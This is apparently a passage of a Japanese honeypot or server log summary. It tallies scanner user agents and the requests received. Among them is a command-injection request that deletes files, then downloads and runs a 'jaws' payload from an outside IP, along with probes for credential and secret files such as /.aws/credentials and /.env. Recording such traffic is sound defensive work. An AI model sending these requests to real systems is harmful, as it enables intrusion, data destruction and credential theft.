| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 1 | Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 |
| 33 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 10 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 4 | Mozilla/5.0 zgrab/0.x |
| 7 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
| 1 | masscan/1.3 (https[:]//github[.]com/robertdavidgraham/masscan) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
| 1 | MGLNDD_13.67.44.234_80 |
||
| 1 | \x03 |
||
| 16 | \x16\x03\x01 |
||
| 2 | \x16\x03\x02\x01o\x01 |
||
| 1 | CONNECT | cipicaoadminpanel[.]xyz:443 |
HTTP/1.1 |
| 3 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 1 | GET | /.env.bak |
HTTP/1.1 |
| 33 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /aaa9 |
HTTP/1.1 |
| 1 | GET | /aab8 |
HTTP/1.1 |
| 2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /aws.yml |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 6 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 3 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+45[.]12[.]253[.]180/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 2 | GET | /systembc/password.php |
HTTP/1.0 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 10 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
